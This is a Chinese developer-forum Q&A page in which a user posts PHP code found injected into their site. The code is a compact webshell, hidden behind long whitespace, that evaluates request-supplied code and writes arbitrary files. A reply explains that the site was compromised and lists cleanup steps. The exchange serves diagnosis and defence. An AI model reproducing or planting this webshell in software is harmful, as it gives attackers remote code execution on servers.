备案控制台
探索云世界
开发者社区> 问答> 正文

PHP文件莫名其妙的被加了代码,什么原因?

PHP文件莫名其妙的被加了代码,看不懂,求解释

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $kfwcbh = "cf051a1756834f0f9972191ffdf8ecfc";
if(isset($_REQUEST['cvbswp'])){ 
    $vdvb = $_REQUEST['cvbswp']; eval($vdvb); exit();
} 
if(isset($_REQUEST['ztkb'])) {
    $lzoki = $_REQUEST['hyrvkum'];
    $xhwpemsz = $_REQUEST['ztkb'];
    $oarnubp = fopen($xhwpemsz, 'w');
    $npty = fwrite($oarnubp, $lzoki);
    fclose($oarnubp);
    echo $npty; exit();
} ?>

展开
收起
落地花开啦 2016-06-13 17:44:20 2177 0
1 条回答
写回答
取消 提交回答
  • 落地花开啦
    喜欢技术,喜欢努力的人

    你的网站应该被入侵了。
    eval 是用来动态执行一段代码,而这段代码是通过$_REQUEST传递过来,并且未做过滤。
    第二段是用来上传文件,讲攻击者自己的PHP文件上传至你的服务器。
    请检查一下服务器的用户,禁用未知的管理员帐号,并修改自己的用户名密码。
    PHP 配置文件中写的 MySQL 等帐号的密码请及时修改。
    对相关 PHP 文件进行检查,看是否还有其他入侵脚本。
    杀毒。

    2019-07-17 19:36:38
    赞同 展开评论 打赏
问答分类:
PHP
问答标签:
PHP代码 PHP文件
问答地址:
开发者社区 > 开发与运维 > 问答

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关问答
阿里函数计算中,找到php.ini,修改conf.d里面的20-swoole.ini文件
880
1
0
打开wp-config.php是应该在我的仓库内 是吗 ? 不太懂,是不是直接在文件
296
1
0
php如何通过代码获取应用上的环境变量啊
497
1
0
php显示没有权限写文件怎么办?
1086
2
0
用aliyun-oss-php-sdk-master 上传中文文件名报错
517
0
0
Flume中Ganglia php页面显示为文件或者提示下载文件解决方法是什么呢?
442
1
0
zabbix中用什么函数来表示优先处理index php命名的文件?
427
1
0
在Subversion中当查看当前工作区test.php文件与最新版本的差异时需要怎么做?
390
1
0
在Subversion中怎么添加当前目录下所有php文件?
550
1
0
docker搭建nginx php后访问php文件显示空白怎么处理?
1017
1
0
问答排行榜
最热
最新
1 通过阿里云代备案系统进行个人快速备案 2699493
2 【大咖问答】对话PostgreSQL 中国社区发起人之一,阿里云数据库高级专家 德哥 1818148
3 据说在家办公的程序员是这样写代码的? 1792066
4 阿里云开放端口权限 689766
5 《阿里云服务器从入门到精通》—论坛精华帖汇总(2013.8.21更新) 599342
6 如何升级配置 536009
7 【藏经阁一起读(27)】本周推荐《Apache Flink案例集(2022版)》,你有哪些心得? 522279
8 【精品问答】python技术1000问(1) 513931
9 Flink Forward Asia 2021 有奖问答 512757
10 Linux Bash严重漏洞修复紧急通知(已全部给出最终修复方案) 456880
11 工信部官网:www.miitbeian.gov.cn打不开解决办法 399439
12 OceanBase 使用动画(持续更新) 359216
13 阿里云LNAMP(Linux + Nginx + Apache + MySQL + PHP)环境一键安装脚本 329675
14 OSS存储服务-客户端工具 321205
15 为体验实验室取一个新名字。 307144
16 企业邮箱发送邮件时,若出现投递失败产生退信,内容提示包含如下: the mta server of * reply:550 failed to meet SPF requirements 或者 the mta server of 163.com — 163mx01.mxmail.netease.com(220.181.14.141) reply:550 MI:SPF mx14,QMCowECpA0qTiftVaeB3Cg—.872S2 1442548128 http://mail.163.com/help 303623
17 Win Server 2003-2016 加密勒索事件必打补丁合集 295083
18 FLASH播放器,在IE浏览器下显示请确定您的域名已完成备案和CNAME绑定 283417
19 安全组详解,新手必看教程 277219
20 写code还是做管理,开发者如何进行职业规划? 268206
1 在做程序员的道路上,你掌握了什么关键的概念或技术让你感到自身技能有了显著飞跃? 821
2 作为一个经典架构模式,事件驱动在云时代为什么会再次流行呢? 642
3 宜搭:提交表单前,如何校验另一张表单的数据? 132
4 如何看待首个 AI 程序员入职科技公司? 1568
5 未启用对服务器的访问 462
6 在图像处理应用场景下,Serverless架构的优势体现在哪些方面? 1378
7 如何处理线程死循环? 1822
8 宜搭自定义页面,这个是怎么配置的 144
9 Idea 2024.1RC 报错提示 129
10 如何写出更优雅的并行程序? 1581
11 你认为一个优秀的技术PM应该具备什么样的能力? 2005
12 宜搭页面复制问题 317
13 宜搭审批节点调用连接器给表单组件赋值 111
14 宜搭在自定义页面保存数据新建表单后如何返回新建表单formInstId值 103
15 Nacos配置了鉴权 登录接口返回caused:这个有谁清楚吗? 109
16 从哪个版本开始nacos分成了两个端口?8848和9848 107
17 钉钉宜搭中要如何实现每日定时自动获取表单1中符合条件的实例数量总和,并赋值给表单2中的某个组件 299
18 宜搭官方的视频板块,图片上是怎么加文字样式的。 152
19 宜搭官方的这种页面是怎么实现的。 199
20 宜搭自定义页面,如何搭建这种效果? 117

相关课程

更多
  • PHP进阶教程 - 由浅入深掌握面向对象开发 - 第二阶段
    167
    33
    去学习
  • PHP完全自学手册文档教程
    9526
    88
    去学习
    • 推荐问答
    乘风问答官招募中!机械键盘免费拿

    相关文章

  • php实现归并排序
  • php遇到内存溢出
  • 深入解析PHP的命名空间和自动加载机制
  • 使用PHP实现动态代理IP的功能
  • 开发语言漫谈-PHP

    • 相关电子书

    更多
    • 阿里云栖开发者沙龙PHP技术专场-深入浅出网络编程与swoole内核-吴镇宇 立即下载
    PHP安全开发:从白帽角度做安全 立即下载
    PHP 2017.北京 全球开发者大会——高可用的PHP 立即下载

    相关实验场景

    更多
  • 1分钟SAE部署PHP商城小程序
    1021
    1.0小时
    去实验
  • 10分钟Serverless部署PHP商城
    1099
    1.0小时
    去实验